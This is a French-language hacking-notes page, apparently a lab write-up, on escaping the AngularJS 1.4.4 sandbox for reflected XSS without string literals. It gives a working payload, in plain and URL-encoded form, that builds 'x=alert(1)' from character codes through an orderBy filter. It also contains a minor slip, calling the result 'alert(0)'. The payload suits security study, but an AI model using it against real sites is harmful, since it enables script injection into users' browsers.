> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/web/xss/angularjs-sandbox-escape-without-strings.md).

# Échappement du sandbox AngularJS sans chaînes

### XSS réfléchi avec évasion du bac à sable AngularJS sans chaînes

XSS réfléchi sur AngularJS **1.4.4** — échapper au bac à sable et exécuter `alert(1)` sans `$eval` ou des littéraux de chaîne.

<figure><img src="/files/5890d4877c64de674ec58bbbf0b255f7763bfa08" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/474fd6c4ff4646654074b9bf3d42e096a9750aec" alt=""><figcaption></figcaption></figure>

**Code observé**

```javascript
angular.module('labApp', []).controller('vulnCtrl',function($scope, $parse) {
                            $scope.query = {};
                            var key = 'search';
                            $scope.query[key] = 'test';
                            $scope.value = $parse(key)($scope.query);
                        });
```

**Tentatives**

* Test de chaîne / $eval (ne fonctionne pas) : / `{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}`
* L'analyse peut être interrompue en injectant via la chaîne de requête avec `&`:/ `&7+ 7` → `&7%2b7`

<figure><img src="/files/445f65ce6df818d4a8cd362e59f0e203c6da78fb" alt=""><figcaption></figcaption></figure>

Construire dynamiquement `alert(1)` via `toString().constructor.fromCharCode(...)` et forcer l'évaluation du filtre (`orderBy`):

<figure><img src="/files/429fb83bb37913078592bba5f00b27df484d0723" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```javascript
toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)
```

{% endcode %}

" Ce fragment interrompt l'analyse et, en hexadécimal/ASCII, produit la `alert(0)` chaîne.

**Charge utile (encodée en URL fournie)**

{% code overflow="wrap" %}

```javascript
%74%6f%53%74%72%69%6e%67%28%29%2e%63%6f%6e%73%74%72%75%63%74%6f%72%2e%70%72%6f%74%6f%74%79%70%65%2e%63%68%61%72%41%74%3d%5b%5d%2e%6a%6f%69%6e%3b%20%5b%31%2c%32%5d%7c%6f%72%64%65%72%42%79%3a%74%6f%53%74%72%69%6e%67%28%29%2e%63%6f%6e%73%74%72%75%63%74%6f%72%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%31%32%30%2c%36%31%2c%39%37%2c%31%30%38%2c%31%30%31%2c%31%31%34%2c%31%31%36%2c%34%30%2c%34%39%2c%34%31%29
```

{% endcode %}

<figure><img src="/files/e21f992adb4c97082ff5334cfdc23ceeb3f7688f" alt="" width="366"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/web/xss/angularjs-sandbox-escape-without-strings.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
